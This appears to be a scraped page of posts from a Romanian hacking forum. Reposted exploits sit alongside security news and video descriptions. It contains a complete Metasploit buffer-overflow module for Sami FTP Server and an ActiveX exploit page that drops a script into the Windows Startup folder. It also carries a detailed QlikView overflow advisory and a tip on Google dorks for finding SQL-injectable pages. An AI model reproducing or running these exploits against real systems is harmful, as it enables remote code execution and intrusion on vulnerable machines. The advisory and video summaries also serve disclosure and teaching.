Kwelwild

Sami FTP Server LIST Command Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Sami FTP Server LIST Command Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow on Sami FTP Server 2.0.1. The vulnerability exists in the processing of LIST commands. In order to trigger the vulnerability, the "Log" tab must be viewed in the Sami FTP Server managing application, in the target machine. On the other hand, the source IP address used to connect with the FTP Server is needed. If the user can't provide it, the module will try to resolve it. This module has been tested successfully on Sami FTP Server 2.0.1 over Windows XP SP3. }, 'Platform' => 'win', 'Author' => [ 'superkojiman', # Original exploit 'Doug Prostko <dougtko[at]gmail.com>' # MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '90815'], [ 'BID', '58247'], [ 'EDB', '24557'] ], 'Privileged' => false, 'Payload' => { 'Space' => 1500, 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x20\x5c", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Targets' => [ [ 'Sami FTP Server 2.0.1 / Windows XP SP3', { 'Ret' => 0x10028283, # jmp esp from C:\Program Files\PMSystem\Temp\tmp0.dll 'Offset' => 228 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 27 2013')) register_options( [ OptAddress.new('SOURCEIP', [false, 'The local client address']) ], self.class) end def exploit connect if datastore['SOURCEIP'] ip_length = datastore['SOURCEIP'].length else ip_length = Rex::Socket.source_address(rhost).length end buf = rand_text(target['Offset'] - ip_length) buf << [ target['Ret'] ].pack('V') buf << rand_text(16) buf << payload.encoded send_cmd( ['LIST', buf], false ) disconnect end end Sursa: Sami FTP Server LIST Command Buffer Overflow

Dac? ai v?zut reportajul de la "România te iubesc" te anun? ca nu e chiar un exemplu de urmat Vrei sa te apuci de spart site-uri si de furat conturi...dup? un timp devine plictisitor, înva?? ceva care sa iti ajute pe viitor.

Si ce Dumnezeu e nou?!

Welcome mate!

EastFTP ActiveX Control 0Day ################################################################# # # EastFTP ActiveX Control 0Day # By: Dr_IDE # Vendor Homepage:http://www.ftpocx.com/download.htm # Version: 4.6.02 # # Self Promotion: http://irresponsibledisclosure.blogspot.com ################################################################# <html> <object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target'/></object> <script> var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta"; var king = "><" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>"; var easy = 1; target.LocalFileWrite(sofa,king,easy); </script> <body> EaseFTP ActiveX Control 0-Day Local Exploit<br> By: Dr_IDE<br> Self Promotion: http://irresponsibledisclosure.blogspot.com<br> Vendor Homepage:http://www.ftpocx.com/download.htm<br> Version: 4.6.02<br> Class FtpLibrary<br> GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}<br> Number of Interfaces: 1<br> Default Interface: _FtpLibrary<br> RegKey Safe for Script: False<br> RegkeySafe for Init: False<br> KillBitSet: False<br> </body> </html> Sursa: http://www.exploit-db.com/exploits/24863/

Demo: Defeat Ssl-Protection During A Mitm-Attack Description: Demo: Defeat SSL-Protection during a MITM-attack used tools: - sslstrip - arpspoof Credits: danielhaake.de Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Demo: Defeat Ssl-Protection During A Mitm-Attack

http://www.youtube.com/watch?v=oNfHhVwHQUc

Description: By default , vpn is not configure in Kali Linux. If u want to connect vpn in kali linux , first install pptp and network openvpn in kali linux using apt-get install. Command : apt-get install network-manager-openvpn-gnome apt-get install network-manager-pptp apt-get install network-manager-pptp-gnome apt-get install network-manager-strongswan apt-get install network-manager-vpnc apt-get install network-manager-vpnc-gnome /etc/init.d/network-manager restart Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Configure Vpn In Kali Linux

Folositor, zic eu (chiar as vrea sa o aud pe Polonic)

Chiar sunt interesat ce va prezenta in reportaj, o sa urmaresc si eu emisiunea. Pare ca omu' s-a schimbat mult.

Scandal in presa de peste Atlantic: hackerii de la Anonymous au fost ajutati de un editor al agentiei Reuters sa "sparga" site-ul publicatiei LA Times Matthew Keys, editor pe social media al prestigioasei agentii de stiri Reuters, a fost chemat in judecata pentru conspiratie impreuna cu hackerii celebrei organizatii Anonymous. Numele agentiei de stiri Reuters a fost impins intr-un scandal in care sunt implicati si oamenii de la Anonymous. Hackerii au fost ajutati de Matthew Keys, editor al agentiei, cu parolele de acces in reteaua Tribune Company. "Tradarea" le-a facilitat hackerilor accesul la site-urile mai multor publicatii, nu de putine ori acestia alterand continutul informatiilor postate. S-a demonstrat ca cei de la Anonymous au intrat de mai multe ori pe site-ul Los Angeles Times, angajatul publicatiei venind cu dovezi clare (screenshot-uri) in acest sens. Se pare ca Mattew Keys le-ar fi dat hackerilor parolele de acces printr-un site de chat, editorul folosind chiar expresia "go f**k some shit up". Fost angajat al unui post local din reteaua de televiziune Fox, Keys este pasibil de amenzi uriase dar si de 10 ani de inchisoare. Editorul lucra de un an pentru agentia de stiri Reuters. Surs?: Scandal in presa de peste Atlantic: hackerii de la Anonymous au fost ajutati de un editor al agentiei Reuters sa sparga site-ul publicatiei LA Times - www.yoda.ro

Description: Penetration Test MetaSploitable2´s DVWA Web Application File Inclusion with Armitage From RFI to root by http://security-is-just-an-illusion.blogspot.de/2013/03/penetration-test-metasploitable2s-dvwa_14.html Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: http://www.securitytube.net/video/7143

Description: Security researcher Christy Philip Mathew came up with combination of Clickjacking and CSRF vulnerabilities in Google's Docs that can allow a hacker to create a document in victim's Drive for further phishing attack. Hacking Google users with Google's GooPass phishing attack - Hacking News Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Csrf And Clickjacking : Google Document, Drawing, Forms, Spreadsheet, Presentation

http://www.youtube.com/watch?feature=player_embedded&v=M6j6vSleJbU Description: In this video Christy Philip Mathew shows us a demon on Facebook URL Redirection. He reported this vulnerability to Facebook and issues is fixed so now this demonstration is safe to learn - how this attack happened. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Facebook URL Redirection Vulnerability - YouTube Surs?: Facebook Url Redirection Vulnerability

Google, amendata cu 7 milioane de dolari pentru "intruziunea" in retelele wi-fi private in timp ce lucra la Street View Pusa de multa vreme pe tapet si recunoscuta de compania amendata, intrarea in retelele wi-fi private (pur si simplu "accidental") in timpul realizarii hartilor Street View a fost intr-un final pedepsita. Deocamdata doar in Statele Unite. Compania californiana este buna de plata chiar daca suma nu este una "de speriat" pentru ea. Cele 7 milioane de dolari inseamna mult prea putin pentru distrugerea emailurilor, a parolelor si a altor detalii ale detinatorilor de retele wi-fi private. "Utilizatorii de tehnologie au tot dreptul de a-si proteja datele personale de orice intruziune. Ce a facut Google este o amenintare la securitatea privata, legea pedepsindu-i pe cei care obtin informatii confidentiale fara permisiunea detinatorului", a spus Eric Schneiderman, din partea Curtii de Justitie a statului New York. Google a intrat "accidental" in retelele wi-fi private intre 2008 si 2010, pe cand lucra la programul Street View. Pe langa amenda, compania este datoare cu scuze celor care au avut retelele violate, chiar daca, asa cum se spune intr-un comunicat oficial al companiei, "niciun angajat nu a consultat informatiile adunate accidental". Surs?: Google, amendata cu 7 milioane de dolari pentru intruziunea in retelele wi-fi private in timp ce lucra la Street View - www.yoda.ro

http://www.youtube.com/watch?feature=player_embedded&v=KRlUhrWi7Lc Description: This quick video shows you how to protect your site against SQLi, XSS and common threats by using Exploit Pack. More info at: Exploit Pack - Security tools Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: [Exploit Pack] - Protection against SQLi , XSS and more! - YouTube Surs?: [Exploit Pack] - Protection Against Sqli , Xss And More!

Description: Penetration Test MetaSploitable2´s DVWA Web Application Command Injection with Armitage More Inf0s on : http://security-is-just-an-illusion.blogspot.de/2013/03/penetration-test-metasploitable2s-dvwa.html Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: http://www.securitytube.net/video/7134

An integer overflow vulnerability exists in the .qvw file format parser in QlikView Desktop Client version 11.00 SR2. A parameter that is responsible for the section length is checked improperly, which causes a heap overflow if any value bigger than 0x80000000 is set. Successful exploitation of this vulnerability could result in an arbitrary code execution within the QlikView Desktop client. SEC Consult Vulnerability Lab Security Advisory < 20130313-0 > ======================================================================= title: QlikView Desktop Client Integer Overflow product: QlikView Desktop Client vulnerable version: 11.00 SR2 fixed version: 11.20 SR1 CVE: impact: High homepage: http://www.qlikview.com/ found: 2012-10-22 by: A. Antukh, M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "QlikView is a new kind of business intelligence software that changes your world. Its BI software that lets you stop guessing and start knowing how to make faster, smarter decisions." Source: http://www.qlikview.com/us/explore Vulnerability overview/description: ----------------------------------- An integer overflow vulnerability exists in the .qvw file format parser. A parameter that is responsible for the section length is checked improperly, which causes a heap overflow if any value bigger than 0x80000000 is set. Successful exploitation of this vulnerability could result in an arbitrary code execution within the QlikView Desktop client. Vulnerability details: ---------------------- The .qvw file is divided into several sections with a specified delimiter. Among others, there is a parameter which is responsible for defining the section length. On the hex listing below it's the DWORD A4 00 00 00 (address 315EF) 000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23 000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00 000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03 000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4 000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47 If by any reasons the value is bigger than the actual size of the section, an error is handled by a C++ EH and a message "Document failed to load" is shown. The check condition can be seen here: .text:00D6BD66 mov eax, [edi+28h] .text:00D6BD69 mov ebx, [eax] ; here is the length parameter .text:00D6BD6B add eax, 4 .text:00D6BD6E mov [edi+28h], eax .text:00D6BD71 cmp ebx, [ebp+var_14] .text:00D6BD74 jg loc_D6BBAC ; check if the parameter value is bigger than actual length However, the comparison operates with a signed number and doesn't check if it's less than zero. In other words, if an attacker supplies a DWORD bigger than 0x80000000, the jump will not be taken (as the number will be considered as negative), causing an integer overflow. After that, the length parameter is used as the DstSize argument to the CArchive::Read function: .text:00D6BD7A mov eax, [ebp+Dst] .text:00D6BD7D push ebx ; DstSize .text:00D6BD7E push eax ; Dst .text:00D6BD7F mov ecx, edi .text:00D6BD81 call ?Read@CArchive@@QAEIPAXI@Z ; CArchive::Read(void *,uint) A large amount of data is read. It is used later to fill the created Archive whose size is 0x8000: .text:00B26207 push 0 .text:00B26209 push 8000h .text:00B2620E push 1 .text:00B26210 lea eax, [ebp+var_60] .text:00B26213 push eax .text:00B26214 lea ecx, [ebp+var_A8] .text:00B2621A call ??0CArchive@@QAE@PAVCFile@@IHPAX@Z ; CArchive::CArchive(CFile *,uint,int,void *) This results in the controlled address being overwritten with the controlled value. .text:009F3092 mov ecx, [esi] .text:009F3094 mov edx, [esi+4] .text:009F3097 mov [ecx+4], edx ; here the error occurs; .text:009F3097 ; trying to write at non-existing address An extract from a debugger with the occurence of the error is presented below. eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10 eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 Qv+0x5f3097: 01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=???????? Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in QlikView 11.00 SR2, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2012-11-08: Contacted vendor through support@qlikview.com 2012-11-12: Initial vendor response - issue will be verified 2012-12-13: Vulnerability is confirmed and reproduced by the vendor 2013-03-06: Vendor releases patch / new version 2013-03-13: Coordinated disclosure Solution: --------- Update to QlikView 11.20 SR1 Workaround: ----------- None Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com http://blog.sec-consult.com EOF A. Antukh / @2013 Surs?: QlikView Desktop Client 11.00 SR2 Integer Overflow ? Packet Storm

Csaw Ctf 2011 Qualification Round Challenges Description: In this video Derek Thomas (@DerekSThomas) shows us solutions for the CSAW CTF 2011 Qualification Round Challenges. Derek is a Security Consultant and Security Practitioner. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Csaw Ctf 2011 Qualification Round Challenges

Owasp Detroit: Covert Channels And Controls In .Net Description: In this video J Wolfgang Goerlich talking about OWASP Detroit. Some Stories: Story Overview Demonstration Some code as applicable Note for the attacker Note for the defender Q&A Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Surs?: Owasp Detroit: Covert Channels And Controls In .Net

Google Reader dispare la 1 iulie. Utilizatorii au lansat o petitie pentru salvarea RSS readerului Google face curatenia de primavara. Mai multe servicii vor disparea Aplicatia Google Reader, care iti permite sa citesti fluxurile RSS, va disparea incepand cu data de 1 iulie 2013. Utilizatorii din toata lumea sunt, in acest moment, notificati. Vestea nu a fost primita tocmai bine, pe Internet existand acum mai multe petitii pentru salvarea acestui serviciu. De la lansarea sa, in 2005, Google Reader nu s-a schimbat prea mult. Motivul pentru care Google a decis sa renunte la el este numarul in scadere al utilizatorilor. Anuntul a fost facut de Urs Holzle, senior vice president Technical Infrastructure. Aceasta aplicatie le permitea utilizatorilor sa aiba acces la site-urile de stiri si la blogurile favorite, dintr-o singura interfata. Aspectul este asemanator cu cel al unei casute de email. Aplicatiile concurente, ca de exemplu FlipBoard sau Pulse sunt, insa, mult mai vizuale. "Am lansat Google Reader in 2005, intr-un efort de a le facilita oamenilor descoperirea si urmarirea site-urilor lor preferate. Cu toate ca produsul are un public loial, de-a lungul anilor, folosirea lui a scazut. Prin urmare, pe 1 iulie 2013, Google Reader va iesi la pensie", a spus Holzle intr-o postare pe blog. Utilizatorii pot sa isi exporte informatiile, inclusiv abonamentele la site-uri, prin intermediul Google Takeout. Una dintre petitiile utilizatorilor a strans, pana acum, cateva mii de semnaturi. Pe YouTube a aparut si un clip video cu Hitler pe acest subiect: Surs?: Google Reader dispare la 1 iulie. Utilizatorii au lansat o petitie pentru salvarea RSS readerului - www.yoda.ro

Nu am facut nimic momentan in C++.

Firefox blocheaza cookie-urile din afara browserului si a site-ului cautat Un student la Stanford si un activist al securitatii in online au ajutat Firefox sa ajunga la performanta Safari: eliminarea cookie-urilor care nu au legatura cu browserul sau site-ul pe care se afla utilizatorul. Firefox, un fervent aparator al ideii "Do Not Track" (prin care agentiile de publicitate sunt obligate sa nu-i 'urmareasca' pe cei care navigheaza pe internet), este unul dintre cele 22 de browsere care va bloca cookie-urile venite de la "terti" (din afara softului sau a site-ului cautat). Schimbarea a fost facuta datorita efortului unui student si a unul activist in securitatea online. Cookie-ul, un "dispozitiv" electronic care permite recoltarea de informatii despre utilizatorul site-ului respectiv, va fi blocat de un "patch" produs de Jonathan Mayer, un cunoscut activist in domeniul securitatii pe internet si un student la prestigioasa Stanford. Despre acest "patch" lumea publicitatii spune ca este ca "un atac nuclear". Teama publicitarilor nu trebuie sa fie foarte mare avand in vedere ca Safari blocheaza cookie-urile din afara browser-ului si a site-ului cautat de mai bine de 10 ani, iar totul... merge mai departe pentru utilizatorii internetului dar si pentru cei din industria publicitatii. Surs?: Firefox blocheaza cookie-urile din afara browserului si a site-ului cautat - www.yoda.ro

Erau confuzii de nume si da, eu sunt (asta ca sa stie lumea, nu ma feresc).

Pune dork-ul fara "inurl:", doar (php?id=). //EDIT Pt a functiona scannerul trebuie sa introduceti GoogleSearchAPI.dll in folderul cu SQLidot.exe